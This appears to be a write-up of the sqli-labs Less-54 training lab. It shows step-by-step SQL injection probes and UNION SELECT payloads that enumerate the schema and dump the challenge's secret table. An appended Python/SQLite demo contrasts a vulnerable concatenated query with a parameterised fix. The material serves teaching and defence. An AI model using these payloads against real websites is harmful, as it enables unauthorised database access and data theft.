SQL Injection Less54 (attempt-limited SQL injection + UNION injection)
2022-07-31 22:34:00 [Huawei Cloud]

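SQL injection with a limited number of attempts
Every reset changes the database's table names, column names and data.
?id=1
?id=1'
No error message is shown.
?id=1"
The page renders normally, so closures that begin with a double quote can be ruled out directly.
?id=1'--+
?id=1')--+
?id=1'))--+
The single-quote form renders normally, so the parameter is closed with a single quote.
?id=1' order by 3--+ renders normally
?id=1' order by 4--+ returns an error
So there are three columns.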
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
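
Why the probes above behave as they do, and what closes the hole: this is an added example, not code from the original post or from the lab. It assumes the query wraps id in single quotes and concatenates it, uses an in-memory SQLite database in place of the lab's MySQL, and the table, data and function names are hypothetical.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    return db


def lookup_vulnerable(db, user_id):
    # Assumed pattern: id placed between single quotes by string concatenation,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        # Errors are swallowed, matching the "no error message" behaviour above.
        return []


def lookup_safe(db, user_id):
    # Hardened form: accept only a short run of ASCII digits, then bind the
    # value as a parameter so it can never change the statement's structure.
    if not re.fullmatch(r"[0-9]{1,10}", user_id):
        return []
    return db.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (int(user_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Inputs are the URL-decoded forms of the probes above ("--+" becomes "-- ").
    probes = ["1", "1'", "1'-- ", "1' order by 3-- ", "1' order by 4-- ",
              "-1' union select 1,2,3-- "]
    for p in probes:
        print(repr(p), "vulnerable:", lookup_vulnerable(db, p),
              "safe:", lookup_safe(db, p))
```

With the bound parameter, every probe except the plain `1` returns no rows, so neither the quote test nor the `order by` column count leaks anything about the statement.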
